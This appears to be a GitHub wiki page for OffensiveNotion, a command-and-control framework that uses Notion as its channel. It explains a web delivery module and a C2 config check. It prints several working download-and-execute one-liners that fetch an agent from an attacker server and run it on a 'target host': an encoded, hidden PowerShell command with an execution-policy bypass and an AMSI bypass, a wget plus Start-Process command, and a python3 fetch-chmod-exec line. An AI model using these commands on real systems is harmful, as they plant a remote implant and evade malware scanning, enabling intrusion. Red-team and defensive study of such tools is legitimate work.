Skip to content

8. Misc

HuskyHacks edited this page Mar 22, 2022 · 2 revisions

Other information about OffensiveNotion that you may find useful.

main.py Capabilities

main.py, in addition to building the agent and setting its source configs, has a few other tricks up its sleeve.

🟠 Important

Remember that the arguments for main.py are the same whether you're using the script as a stand alone or as part of the Docker workflow. The usage statements below show it in use as a standalone script on the physical host. But the args are the same either way.

Web Delivery

Inspired by Metasploit Framework's web_delivery module, OffensiveNotion has a lightweight web delivery module of its own. You can start it by using the main.py script when building your agent. Once the agent has finished compiling, it is served out using a simple Flask server and provides a convenient one-liner for download and execution on the target based on your provided parameters.

Usage

Web delivery uses the following parameters which can be seen in the help message for main.py:

...

  -w, --webdelivery     Start a web delivery server to host and deliver your
                        agent. Provides convenient one liners to run on the
                        target.
  -m {powershell,wget-linux,wget-psh,python-linux,python-windows}, --method {powershell,wget-linux,wget-psh,python-linux,python-windows}
                        Method of web delivery
  -ip HOSTIP, --hostIP HOSTIP
                        Web server host IP.
  -p PORT, --port PORT  Web server host port.

Methods for Delivery

  • powershell: Creates a base64 encoded PowerShell one-liner that includes an AMSI bypass. Also prompts to input a custom AMSI bypass if you have one on hand.
  • wget-linux: Creates a simple bash one-liner to download and execute the agent via wget.
  • wget-psh: Creates a one-liner that uses the PowerShell wget cmdlet, which is a short-hand version of Invoke-WebRequest. This method does not include an AMSI bypass.
  • python-linux: Creates a python3 one-liner to download and exec() the agent.
  • python-windows: Creates a python3 one-liner to download and exec() the agent.

Examples

Use the powershell method to build and serve a Windows agent on port 8080. Note that it prompts you to input your favorite AMSI bypass:

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 main.py -o windows -b release -w -m powershell -ip 10.10.1.130 -p 8080
[*] Checking Docker...
[+] Docker is installed!
...[snip]...
[*] Copying agent
[*] Generating payload
[!] Enter your favorite AMSI bypass. Leave blank for a default > [...enter or leave blank...]

[!] Run this on the target host:
[*] powershell.exe -nop -w hidden -ep bypass -e JABRAGYAbAB0AEcATQBmAGkAPQAkAG4AdQBsAGwAOwAkAGcAdAB......

 * Running on http://10.10.1.130:8080/ (Press CTRL+C to quit)

Use the psh-wget method to build and serve an agent on port 80:

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 main.py -b release -o windows -w -m wget-psh -ip 10.10.1.130 -p 80
[*] Checking Docker...
[+] Docker is installed!
...[snip]...
[*] Generating payload
[!] Run this on the target host:
[*] wget http://10.10.1.130:80/Enjkg2Of -usebasicparsing -o 3mC94ScA;  Start-Process -FilePath .\3mC94ScA -Wait -NoNewWindow

 * Running on http://10.10.1.130:80/ (Press CTRL+C to quit)

Use the python-linux method to build and serve a Linux agent on port 80:

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 main.py -b release -o linux -w -m python-linux -ip 10.10.1.130 -p 80
[*] Checking Docker...
[+] Docker is installed!
...[snip]...
[*] Generating payload
[!] Run this on the target host:
[*] python3 -c 'import urllib.request; import os; import stat; url = "http://10.10.1.130:80/pkZJ1XgI"; filename = "/tmp/ATzP9bkP"; urllib.request.urlretrieve(url, filename); st = os.stat(filename); os.chmod(filename, st.st_mode | stat.S_IEXEC);os.system(filename)'

 * Running on http://10.10.1.130:80/ (Press CTRL+C to quit)

C2 Linter

Ok, it's not really a linter like the one in Cobalt Strike, but it will help you troubleshoot if your agent isn't working.

Runs a check to ensure the API key and Parent Page ID can check in successfully.

Usage

This is invoked from main.py with the following flag:

  -c, --c2lint          C2 linter. Checks your C2 config by creating a test page on your Listener.

Example

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 main.py -b release -o windows --c2lint -w -m powershell -ip 10.10.1.130 -p 8080
[*] Checking Docker...
[+] Docker is installed!
[*] Checking config file...
[+] Config file located!
[*] Your configs are: 
    [*] SLEEP: 5
    [*] JITTER: 0
    [*] API_KEY: [REDACTED]
    [*] PARENT_PAGE_ID: [...]
    [*] LOG_LEVEL: 0
[*] Checking your C2 configs...
[*] POSTing to the Notion API...
[*] Status code: 200
[+] C2 check passed! Check your Notion notebook for a C2_LINT_TEST page.

image

Clone this wiki locally